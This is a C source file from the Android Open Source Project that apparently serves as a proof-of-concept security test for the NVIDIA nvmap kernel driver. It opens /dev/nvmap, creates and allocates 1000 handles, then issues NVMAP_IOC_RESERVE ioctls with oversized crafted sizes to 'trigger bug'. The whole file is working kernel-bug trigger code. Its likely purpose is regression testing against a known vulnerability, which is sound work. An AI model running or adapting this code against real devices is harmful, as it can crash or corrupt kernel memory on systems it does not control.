1 /*
2  * Copyright (C) 2017 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 #define _GNU_SOURCE
17 #include <stdlib.h>
18 #include <errno.h>
19 #include <unistd.h>
20 #include <stdio.h>
21 #include <dirent.h>
22 #include <string.h>
23 #include <sys/stat.h>
24 #include <sys/ioctl.h>
25 #include <stdio.h>
26 #include <string.h>
27 #include <dlfcn.h>
28 #include <sys/time.h>
29 #include <sys/mman.h>
30 #include <sys/syscall.h>
31 #include <sys/resource.h>
32 #include <fcntl.h>
33 #include <pthread.h>
34 #include <unistd.h>
35 #include <sched.h>
36 
37 
38 struct nvmap_handle_param {
39 	__u32 handle;		/* nvmap handle */
40 	__u32 param;		/* size/align/base/heap etc. */
41 	unsigned long result;	/* returns requested info*/
42 };
43 
44 struct nvmap_create_handle {
45 	union {
46 		__u32 id;	/* FromId */
47 		__u32 size;	/* CreateHandle */
48 		__s32 fd;	/* DmaBufFd or FromFd */
49 	};
50 	__u32 handle;		/* returns nvmap handle */
51 };
52 
53 struct nvmap_alloc_handle {
54 	__u32 handle;		/* nvmap handle */
55 	__u32 heap_mask;	/* heaps to allocate from */
56 	__u32 flags;		/* wb/wc/uc/iwb etc. */
57 	__u32 align;		/* min alignment necessary */
58 };
59 
60 struct nvmap_cache_op_list {
61 	__u64 handles;		/* Ptr to u32 type array, holding handles */
62 	__u64 offsets;		/* Ptr to u32 type array, holding offsets
63 				 * into handle mem */
64 	__u64 sizes;		/* Ptr to u32 type array, holindg sizes of memory
65 				 * regions within each handle */
66 	__u32 nr;		/* Number of handles */
67 	__s32 op;		/* wb/wb_inv/inv */
68 };
69 
70 #define NVMAP_IOC_MAGIC 'N'
71 #define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
72 #define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
73 #define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
74 #define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
75 #define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
76 #define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
77 #define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18,	struct nvmap_cache_op_list)
78 
79 /* common carveout heaps */
80 #define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
81 #define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
82 #define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
83 #define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
84 
85 #define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
86 
87 /* allocation flags */
88 #define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
89 #define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
90 #define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
91 #define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
92 #define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
93 
94 #define NVMAP_HANDLE_SECURE          (0x1ul << 2)
95 #define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
96 #define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
97 #define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
98 #define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
99 #define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
100 enum {
101 	NVMAP_PAGES_UNRESERVE = 0,
102 	NVMAP_PAGES_RESERVE
103 };
104 int g_fd = -1;
105 static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
106 static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
107 struct nvmap_create_handle* g_allocation = NULL;
108 struct nvmap_alloc_handle g_real_alloc = {0};
109 struct nvmap_cache_op_list g_op_list = {0};
110 #define MAX_HANDLE_NUM (1000)
111 int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
112 int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
113 
open_driver()114 int open_driver() {
115     char* dev_path = "/dev/nvmap";
116     g_fd = open(dev_path, O_RDWR);
117     if (g_fd < 0) {
118         printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
119     } else {
120         printf("[*] open file(%s) succ!\n", dev_path);
121     }
122     return g_fd;
123 }
124 
trigger_nvmap_create()125 int trigger_nvmap_create() {
126     g_allocation->handle = -1;
127     ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
128     printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
129     return g_allocation->handle;
130 }
131 
trigger_nvmap_alloc(int handle)132 void trigger_nvmap_alloc(int handle) {
133     g_real_alloc.handle = handle;
134     ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
135     printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
136 }
137 
trigger_nvmap_free(int handle)138 void trigger_nvmap_free(int handle) {
139     ioctl(g_fd, NVMAP_IOC_FREE, handle);
140     printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
141 }
142 
setup_privi_and_affinity(int privi,unsigned long cpu_mask)143 void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
144     setpriority(PRIO_PROCESS, gettid(), privi);
145     printf("[*] setpriority(%d) errno = %d\n", privi, errno);
146 
147     /* bind process to a CPU*/
148     if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
149         printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
150     }
151 }
152 
prepare_data()153 void prepare_data() {
154     int i;
155     void* data = calloc(1, 0x1000);
156 
157     g_allocation = (struct nvmap_create_handle*)data;
158     g_allocation->size = 0x40;
159 
160     g_real_alloc.align = 0x40;
161     g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
162     g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
163 
164     g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
165     g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
166     g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
167     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
168         ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
169     }
170     g_op_list.nr = MAX_HANDLE_NUM;
171     g_op_list.op = NVMAP_PAGES_RESERVE;
172 }
173 
174 
create_handles()175 void create_handles() {
176     int i;
177 
178     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
179         g_handles_for_alloc[i] = trigger_nvmap_create();
180     }
181 
182 }
183 
184 
trigger_rw_handle(int handle)185 void trigger_rw_handle(int handle) {
186     ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
187     printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
188 }
189 
main(int argc,char ** argv)190 int main(int argc, char**argv) {
191     int i;
192 
193     if (open_driver() < 0) {
194         return -1;
195     }
196 
197     prepare_data();
198     create_handles();
199 
200     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
201         trigger_nvmap_alloc(g_handles_for_alloc[i]);
202     }
203 
204     printf("[*] Begin to trigger bug....\n");
205     sleep(1);
206 
207 
208     for (i = 0; i < MAX_HANDLE_NUM; ++i) {
209         trigger_rw_handle(g_handles_for_alloc[i]);
210     }
211 
212     return 0;
213 }
214